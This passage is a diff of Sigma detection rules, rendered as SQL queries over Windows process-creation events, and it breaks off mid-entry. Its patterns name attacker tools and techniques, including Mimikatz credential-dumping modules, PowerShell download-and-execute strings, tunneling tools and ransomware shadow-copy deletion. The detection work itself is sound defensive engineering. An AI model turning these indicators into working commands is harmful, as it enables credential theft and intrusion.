"SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SystemSettingsAdminFlows.exe' ESCAPE '\\' OR OriginalFileName = 'SystemSettingsAdminFlows.EXE') AND CommandLine LIKE '%TurnOnDeveloperFeatures%' ESCAPE '\\' AND (CommandLine LIKE '%DeveloperUnlock%' ESCAPE '\\' OR CommandLine LIKE '%EnableSideloading%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exploit_cve_2022_41120_sysmon_eop.yml" + "filename": "proc_creation_win_systemsettingsadminflows_turn_on_dev_features.yml" }, { - "title": "PUA - CsExec Execution", - "id": "d08a2711-ee8b-4323-bdec-b7d85e892b31", + "title": "Weak or Abused Passwords In CLI", + "id": "91edcfb1-2529-4ac2-9ecc-7617f895c7e4", "status": "experimental", - "description": "Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects weak passwords or often abused passwords (seen used by threat actors) via the CLI. 
An example would be a threat actor creating a new user via the net command and providing the password inline", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.resource_development", - "attack.t1587.001", - "attack.execution", - "attack.t1569.002" + "attack.defense_evasion", + "attack.execution" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the passwords by users via commandline (should be discouraged)", + "Other currently unknown false positives" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\csexec.exe' ESCAPE '\\' OR Description = 'csexec'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Asd123.aaaa%' ESCAPE '\\' OR CommandLine LIKE '%password123%' ESCAPE '\\' OR CommandLine LIKE '%123456789%' ESCAPE '\\' OR CommandLine LIKE '%P@ssw0rd!%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_pua_csexec.yml" + "filename": "proc_creation_win_susp_weak_or_abused_passwords.yml" }, { - "title": "Sdiagnhost Calling Suspicious Child Process", - "id": "f3d39c45-de1a-4486-a687-ab126124f744", - "status": "experimental", - "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", - "author": "Nextron Systems", + "title": "Execution via WorkFolders.exe", + "id": "0bbc6369-43e3-453d-9944-cae58821c173", + "status": "test", + "description": "Detects using WorkFolders.exe to execute an arbitrary control.exe", + "author": "Maxime Thiebaut (@0xThiebaut)", "tags": [ "attack.defense_evasion", - "attack.t1036", "attack.t1218" ], "falsepositives": [ - "Unknown" + "Legitimate usage of the uncommon Windows Work Folders feature." 
], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_sdiagnhost_susp_child.yml" + "filename": "proc_creation_win_susp_workfolders.yml" }, { - "title": "Remote Access Tool - ScreenConnect Suspicious Execution", - "id": "75bfe6e6-cd8e-429e-91d3-03921e1d7962", + "title": "Suspicious Plink Port Forwarding", + "id": "48a61b29-389f-4032-b317-b30de6b95314", "status": "test", - "description": "Detects ScreenConnect program starts that establish a remote access to that system (not meeting, not remote support)", + "description": "Detects suspicious Plink tunnel port forwarding to a local port", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.initial_access", - "attack.t1133" + "attack.command_and_control", + "attack.t1572", + "attack.lateral_movement", + "attack.t1021.001" ], "falsepositives": [ - "Legitimate use by administrative staff" + "Administrative activity using a remote port forwarding to a local port" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND 
CommandLine LIKE '%e=Access&%' ESCAPE '\\' AND CommandLine LIKE '%y=Guest&%' ESCAPE '\\' AND CommandLine LIKE '%&p=%' ESCAPE '\\' AND CommandLine LIKE '%&c=%' ESCAPE '\\' AND CommandLine LIKE '%&k=%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND Description = 'Command-line SSH, Telnet, and Rlogin client' AND CommandLine LIKE '% -R %' ESCAPE '\\')" ], - "filename": "proc_creation_win_remote_access_tools_screenconnect_access.yml" + "filename": "proc_creation_win_plink_port_forwarding.yml" }, { - "title": "PowerShell Get-Clipboard Cmdlet Via CLI", - "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", + "title": "HackTool - PurpleSharp Execution", + "id": "ff23ffbc-3378-435e-992f-0624dcf93ab4", "status": "test", - "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the execution of the PurpleSharp adversary simulation tool", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1115" + "attack.t1587", + "attack.resource_development" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\purplesharp%' ESCAPE '\\' OR OriginalFileName = 'PurpleSharp.exe' OR (CommandLine LIKE '%xyz123456.exe%' ESCAPE '\\' OR CommandLine LIKE '%PurpleSharp%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_get_clipboard.yml" + "filename": "proc_creation_win_hktl_purplesharp_indicators.yml" }, { - "title": "Suspicious Add Scheduled Command Pattern", - "id": "f2c64357-b1d2-41b7-849f-34d2682c0fad", + "title": "Wscript Execution from Non C Drive", + "id": "5b80cf53-3a46-4adc-960b-05ec19348d74", "status": "experimental", - "description": 
"Detects suspicious scheduled task creations with commands that are uncommon", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Wscript or Cscript executing from a drive other than C. This has been observed with Qakbot executing from within a mounted ISO file.", + "author": "Aaron Herman", "tags": [ "attack.execution", - "attack.t1053.005" + "attack.t1059" ], "falsepositives": [ - "Software installers that run from temporary folders and also install scheduled tasks" + "Legitimate scripts located on other partitions such as \"D:\"" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Create %' ESCAPE '\\') AND (((CommandLine LIKE '%/sc minute %' ESCAPE '\\' OR CommandLine LIKE '%/ru system %' ESCAPE '\\') AND (CommandLine LIKE '%cmd.exe /c %' ESCAPE '\\' OR CommandLine LIKE '%cmd /c%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /k %' ESCAPE '\\' OR CommandLine LIKE '%cmd /k%' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /r %' ESCAPE '\\' OR CommandLine LIKE '%cmd /r%' ESCAPE '\\')) OR (CommandLine LIKE '% bypass %' ESCAPE '\\' OR CommandLine LIKE '%.DownloadString%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%FromBase64String%' ESCAPE '\\' OR CommandLine LIKE '% -w hidden %' ESCAPE '\\' OR CommandLine LIKE '% IEX%' ESCAPE '\\' OR CommandLine LIKE '% -enc %' ESCAPE '\\' OR CommandLine LIKE '% -decode %' ESCAPE '\\' OR CommandLine LIKE '%/c start /min %' ESCAPE '\\' OR CommandLine LIKE '% curl %' ESCAPE '\\') OR (CommandLine LIKE '%/xml C:\\\\Users\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%wscript.exe%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' 
OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\') AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\') AND CommandLine LIKE '%:\\\\%' ESCAPE '\\') AND NOT (((CommandLine LIKE '% C:\\\\\\*' ESCAPE '\\' OR CommandLine LIKE '% ''C:\\\\%' ESCAPE '\\' OR CommandLine LIKE '% \"C:\\\\\\*' ESCAPE '\\')) OR (CommandLine LIKE '%\\%%' ESCAPE '\\') OR (CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\')))" ], - "filename": "proc_creation_win_schtasks_susp_pattern.yml" + "filename": "proc_creation_win_susp_lolbin_non_c_drive.yml" }, { - "title": "Exfiltration and Tunneling Tools Execution", - "id": "c75309a3-59f8-4a8d-9c2c-4c927ad50555", - "status": "test", - "description": "Execution of well known tools for data exfiltration and tunneling", - "author": "Daniil Yugoslavskiy, oscd.community", + "title": "PUA - 3Proxy Execution", + "id": "f38a82d2-fba3-4781-b549-525efbec8506", + "status": "experimental", + "description": "Detects the use of 3proxy, a tiny free proxy server", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.exfiltration", "attack.command_and_control", - "attack.t1041", - "attack.t1572", - "attack.t1071.001" + "attack.t1572" ], "falsepositives": [ - "Legitimate Administrator using tools" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\plink.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\socat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\stunnel.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\httptunnel.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\3proxy.exe' ESCAPE '\\' OR Description = '3proxy - tiny proxy server' OR CommandLine LIKE '%.exe -i127.0.0.1 -p%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_exfiltration_and_tunneling_tools_execution.yml" + "filename": 
"proc_creation_win_pua_3proxy_execution.yml" }, { - "title": "Suspicious aspnet_compiler.exe Execution", - "id": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", - "status": "test", - "description": "Execute C# code with the Build Provider and proper folder structure in place.", - "author": "frack113", + "title": "Remote Access Tool - Anydesk Execution From Suspicious Folder", + "id": "065b00ca-5d5c-4557-ac95-64a6d0b64d86", + "status": "experimental", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1127" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use of AnyDesk from a non-standard folder" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%C:\\\\Windows\\\\Microsoft.NET\\\\Framework%' ESCAPE '\\' AND NewProcessName LIKE '%aspnet\\_compiler.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\AnyDesk.exe' ESCAPE '\\' OR Description = 'AnyDesk' OR Product = 'AnyDesk' OR Company = 'AnyDesk Software GmbH') AND NOT ((NewProcessName LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files (x86)\\\\AnyDesk%' ESCAPE '\\' OR NewProcessName LIKE '%Program Files\\\\AnyDesk%' ESCAPE '\\')))" ], - "filename": 
"proc_creation_win_lolbin_aspnet_compiler.yml" + "filename": "proc_creation_win_remote_access_tools_anydesk_susp_exec.yml" }, { - "title": "HackTool - F-Secure C3 Load by Rundll32", - "id": "b18c9d4c-fac9-4708-bd06-dd5bfacf200f", + "title": "Potential MuddyWater APT Activity", + "id": "36222790-0d43-4fe8-86e4-674b27809543", "status": "test", - "description": "F-Secure C3 produces DLLs with a default exported StartNodeRelay function.", - "author": "Alfie Champion (ajpc500)", + "description": "Detects potential Muddywater APT activity", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1218.011" + "attack.execution", + "attack.g0069" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND CommandLine LIKE '%.dll%' ESCAPE '\\' AND CommandLine LIKE '%StartNodeRelay%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%vbscript:Close(Execute(\"CreateObject(%' ESCAPE '\\' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%-w 1 -exec Bypass%' ESCAPE '\\' AND CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%Win32\\_OperatingSystem%' ESCAPE '\\' AND CommandLine LIKE '%Win32\\_NetworkAdapterConfiguration%' ESCAPE '\\' AND CommandLine LIKE '%root\\\\SecurityCenter2%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.DNS]%' ESCAPE '\\') OR (CommandLine LIKE '%[Convert]::ToBase64String%' ESCAPE '\\' AND CommandLine LIKE '%[System.Text.Encoding]::UTF8.GetString]%' ESCAPE '\\' AND CommandLine LIKE '%GetResponse().GetResponseStream()%' ESCAPE '\\' AND CommandLine LIKE '%[System.Net.HttpWebRequest]::Create(%' ESCAPE '\\' AND CommandLine LIKE '%-bxor %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_c3_rundll32_pattern.yml" + "filename": 
"proc_creation_win_apt_muddywater_activity.yml" }, { - "title": "WSL Child Process Anomaly", - "id": "2267fe65-0681-42ad-9a6d-46553d3f3480", - "status": "experimental", - "description": "Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Potential ACTINIUM Persistence Activity", + "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", + "status": "test", + "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" + "attack.persistence", + "attack.t1053", + "attack.t1053.005" ], "falsepositives": [ - "Unknown" + "Unlikely" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\wslhost.exe' ESCAPE '\\') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Temp\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\Desktop\\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' 
ESCAPE '\\')" ], - "filename": "proc_creation_win_wsl_child_processes_anomalies.yml" + "filename": "proc_creation_win_apt_actinium_persistence.yml" }, { - "title": "InfDefaultInstall.exe .inf Execution", - "id": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "title": "Writing Of Malicious Files To The Fonts Folder", + "id": "ae9b0bd7-8888-4606-b444-0ed7410cb728", "status": "test", - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "author": "frack113", + "description": "Monitors for the hiding possible malicious files in the C:\\Windows\\Fonts\\ location. This folder doesn't require admin privillege to be written and executed from.", + "author": "Sreeman", "tags": [ + "attack.t1211", + "attack.t1059", "attack.defense_evasion", - "attack.t1218" + "attack.persistence" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%InfDefaultInstall.exe %' ESCAPE '\\' AND CommandLine LIKE '%.inf%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%echo%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%type%' ESCAPE '\\' OR CommandLine LIKE '%file createnew%' ESCAPE '\\' OR CommandLine LIKE '%cacls%' ESCAPE '\\') AND CommandLine LIKE '%C:\\\\Windows\\\\Fonts\\\\%' ESCAPE '\\' AND (CommandLine LIKE '%.sh%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.bin%' ESCAPE '\\' OR CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.cmd%' ESCAPE '\\' OR CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.msh%' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\' OR CommandLine LIKE '%.scr%' ESCAPE '\\' OR CommandLine LIKE '%.ps%' ESCAPE '\\' OR CommandLine LIKE '%.vb%' ESCAPE '\\' OR CommandLine LIKE '%.jar%' ESCAPE '\\' OR CommandLine LIKE '%.pl%' 
ESCAPE '\\' OR CommandLine LIKE '%.inf%' ESCAPE '\\' OR CommandLine LIKE '%.cpl%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.msi%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_infdefaultinstall_execute_sct_scripts.yml" + "filename": "proc_creation_win_susp_hiding_malware_in_fonts_folder.yml" }, { - "title": "Suspicious Invoke-WebRequest Usage", - "id": "5e3cc4d8-3e68-43db-8656-eaaeefdec9cc", + "title": "Sdiagnhost Calling Suspicious Child Process", + "id": "f3d39c45-de1a-4486-a687-ab126124f744", "status": "experimental", - "description": "Detects a suspicious call to Invoke-WebRequest cmdlet where the and output is located in a suspicious location", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects sdiagnhost.exe calling a suspicious child process (e.g. used in exploits for Follina / CVE-2022-30190)", + "author": "Nextron Systems", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1036", + "attack.t1218" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\') AND (CommandLine LIKE '% -ur%' ESCAPE '\\' OR CommandLine LIKE '% -o%' ESCAPE '\\') AND (CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR 
CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\sdiagnhost.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskkill.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\regsvr32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\calc.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_powershell_invoke_webrequest_download.yml" + "filename": "proc_creation_win_sdiagnhost_susp_child.yml" }, { - "title": "PUA - Fast Reverse Proxy (FRP) Execution", - "id": "32410e29-5f94-4568-b6a3-d91a8adad863", - "status": "experimental", - "description": "Detects the use of Fast Reverse Proxy. 
frp is a fast reverse proxy to help you expose a local server behind a NAT or firewall to the Internet.", - "author": "frack113, Florian Roth", + "title": "HackTool - Mimikatz Execution", + "id": "a642964e-bead-4bed-8910-1bb4d63e3b4d", + "status": "test", + "description": "Detection well-known mimikatz command line arguments", + "author": "Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton", "tags": [ - "attack.command_and_control", - "attack.t1090" + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005", + "attack.t1003.006" ], "falsepositives": [ - "Legitimate use" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\frpc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\frps.exe' ESCAPE '\\') OR CommandLine LIKE '%\\\\frpc.ini%' ESCAPE '\\' OR (Hashes LIKE '%MD5=7D9C233B8C9E3F0EA290D2B84593C842%' ESCAPE '\\' OR Hashes LIKE '%SHA1=06DDC9280E1F1810677935A2477012960905942F%' ESCAPE '\\' OR Hashes LIKE '%SHA256=57B0936B8D336D8E981C169466A15A5FD21A7D5A2C7DAF62D5E142EE860E387C%' ESCAPE '\\') OR md5 = '7d9c233b8c9e3f0ea290d2b84593c842' OR sha1 = '06ddc9280e1f1810677935a2477012960905942f' OR sha256 = '57b0936b8d336d8e981c169466a15a5fd21a7d5a2c7daf62d5e142ee860e387c'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%DumpCreds%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz%' ESCAPE '\\') OR (CommandLine LIKE '%::aadcookie%' ESCAPE '\\' OR CommandLine LIKE '%::detours%' ESCAPE '\\' OR CommandLine LIKE '%::memssp%' ESCAPE '\\' OR CommandLine LIKE '%::mflt%' ESCAPE '\\' OR CommandLine LIKE '%::ncroutemon%' ESCAPE '\\' OR CommandLine LIKE '%::ngcsign%' ESCAPE '\\' OR CommandLine LIKE '%::printnightmare%' ESCAPE '\\' OR CommandLine LIKE '%::skeleton%' ESCAPE '\\' OR CommandLine LIKE '%::preshutdown%' ESCAPE '\\' OR CommandLine LIKE '%::mstsc%' 
ESCAPE '\\' OR CommandLine LIKE '%::multirdp%' ESCAPE '\\') OR (CommandLine LIKE '%rpc::%' ESCAPE '\\' OR CommandLine LIKE '%token::%' ESCAPE '\\' OR CommandLine LIKE '%crypto::%' ESCAPE '\\' OR CommandLine LIKE '%dpapi::%' ESCAPE '\\' OR CommandLine LIKE '%sekurlsa::%' ESCAPE '\\' OR CommandLine LIKE '%kerberos::%' ESCAPE '\\' OR CommandLine LIKE '%lsadump::%' ESCAPE '\\' OR CommandLine LIKE '%privilege::%' ESCAPE '\\' OR CommandLine LIKE '%process::%' ESCAPE '\\' OR CommandLine LIKE '%vault::%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_pua_frp.yml" + "filename": "proc_creation_win_hktl_mimikatz_command_line.yml" }, { - "title": "Potential Maze Ransomware Activity", - "id": "29fd07fc-9cfd-4331-b7fd-cc18dfa21052", + "title": "Suspicious Rundll32 Activity Invoking Sys File", + "id": "731231b9-0b5d-4219-94dd-abb6959aa7ea", "status": "test", - "description": "Detects specific process characteristics of Maze ransomware word document droppers", + "description": "Detects suspicious process related to rundll32 based on command line that includes a *.sys file as seen being used by UNC2452", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1204.002", - "attack.t1047", - "attack.impact", - "attack.t1490" + "attack.defense_evasion", + "attack.t1218.011" ], "falsepositives": [ - "Unlikely" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\WINWORD.exe' ESCAPE '\\' AND NewProcessName LIKE '%.tmp' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\Temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%shadowcopy delete' ESCAPE '\\') OR (CommandLine LIKE '%shadowcopy delete' ESCAPE '\\' AND CommandLine LIKE '%\\\\..\\\\..\\\\system32%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%rundll32.exe%' ESCAPE '\\' AND 
(CommandLine LIKE '%.sys,%' ESCAPE '\\' OR CommandLine LIKE '%.sys %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_malware_maze_ransomware.yml" + "filename": "proc_creation_win_rundll32_sys.yml" }, { - "title": "DeviceCredentialDeployment Execution", - "id": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "title": "File Download Using ProtocolHandler.exe", + "id": "104cdb48-a7a8-4ca7-a453-32942c6e5dcb", "status": "experimental", - "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects usage of \"ProtocolHandler\" to download files. Downloaded files will be located in the cache folder (for example - %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE)", + "author": "frack113", "tags": [ "attack.defense_evasion", "attack.t1218" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\DeviceCredentialDeployment.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\protocolhandler.exe' ESCAPE '\\' OR OriginalFileName = 'ProtocolHandler.exe') AND ((CommandLine LIKE '%\"ms-word%' ESCAPE '\\' AND CommandLine LIKE '%.docx\"%' ESCAPE '\\') OR CommandLine LIKE '% http%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_device_credential_deployment.yml" + "filename": "proc_creation_win_lolbin_protocolhandler_download.yml" }, { - "title": "Port Forwarding Attempt Via SSH", - "id": "327f48c1-a6db-4eb8-875a-f6981f1b0183", + "title": "Suspicious Use of PsLogList", + "id": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", "status": "experimental", - "description": "Detects suspicious SSH tunnel port forwarding to a local port", + "description": "Detects usage of the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery or 
